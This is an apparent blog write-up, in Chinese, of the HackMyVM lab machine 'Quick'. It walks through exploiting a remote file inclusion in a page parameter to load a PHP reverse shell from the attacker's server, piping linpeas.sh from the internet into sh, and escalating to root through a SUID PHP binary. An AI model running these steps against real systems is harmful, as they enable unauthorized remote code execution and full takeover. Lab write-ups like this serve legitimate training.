HMV Quick
信息收集
NAMP 扫描
1 | IP=192.168.0.189 |
看到了一个80端口,是一个Apache服务。
点开后,随便点点链接,发现了 url 是这样的:
http://192.168.0.189/index.php?page=home
尝试入侵
这里可能存在 LFI 漏洞。尝试几次,应该是以 php 结尾的参数。
直接用 baidu 试一试:
http://192.168.0.189/index.php?page=http://baidu.com/index
果然,包含了 baidu 的首页。
接下来,用 Python 在 kali 的 reverse shell目录上启动一个 httpserver
1 | cd /usr/share/webshells/php |
准备好 pwn-cat :pwncat-cs -l 0.0.0.0:1234
然后,尝试 LFI 读取 reverse shell:
http://192.168.0.189/index.php?page=http://192.168.0.30/php-reverse-shell
反弹 shell 成功.
提权
查看下 /etc/passwd,应该是用andrew:x:1000:1000:Andrew Speed:/home/andrew:/bin/bash
这个用户。
flag可以看: /home/andrew/user.txt
PEASS
1 | curl -L https://mirror.ghproxy.com/https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh |
看到应该存在 SUID 权限的文件。
1 | find / -perm -4000 2>/dev/null |
查下 https://gtfobins.github.io/gtfobins/php/#suid 有一个现成的提权方法。
1 | /usr/bin/php7.0 -r 'pcntl_exec("/bin/sh", ["-p"]);' |
拿到 root shell,可以看到 /root/root.txt
评论
评论插件加载失败
正在加载评论插件